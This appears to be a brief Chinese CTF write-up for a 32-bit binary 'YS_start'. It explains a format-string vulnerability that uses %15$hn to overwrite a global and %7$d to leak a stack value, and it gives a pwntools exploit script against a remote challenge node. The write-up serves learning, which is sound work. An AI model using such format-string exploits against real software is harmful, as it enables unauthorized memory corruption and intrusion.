YS_start
checksec
32位程序 没有开PIE
分析主程序
继续分析
io.sendline(p32(0x0804C044)+b"%15$hn"
#%15$hn 其中15为偏移 该代码的作用是将0x0804C044的值改为4
# %n 的作用是 不打印任何内容,并将到目前为止已打印的字符数写入int变量,该参数必须是一个指向带符号的int的指针,
# printf(“hello%n”, &test);test变量被赋值为5
偏移为15
在pwndbg中 查看内存的值
x /10gx 0x0804C044
exp
from pwn import *
io = remote("node6.anna.nssctf.cn",28813)
elf = ELF("./Ys_start")
io.sendline(p32(0x0804C044)+b"%15$hn"+b"%7$d")
# %7d 的作用是
ver = io.recvuntil(b",P", drop=True)[-6:]
#接收最后六个字符
io.sendline(b'y')
io.sendline(b"panyi")
io.sendline(b"panyi")
io.sendlineafter(b"ver", ver) io.interactive()
解释一下%7d 的作用
0x44-0x2c=0x18 0x18/4=6 因为v28在栈上 可以利用%6+1$d 来泄露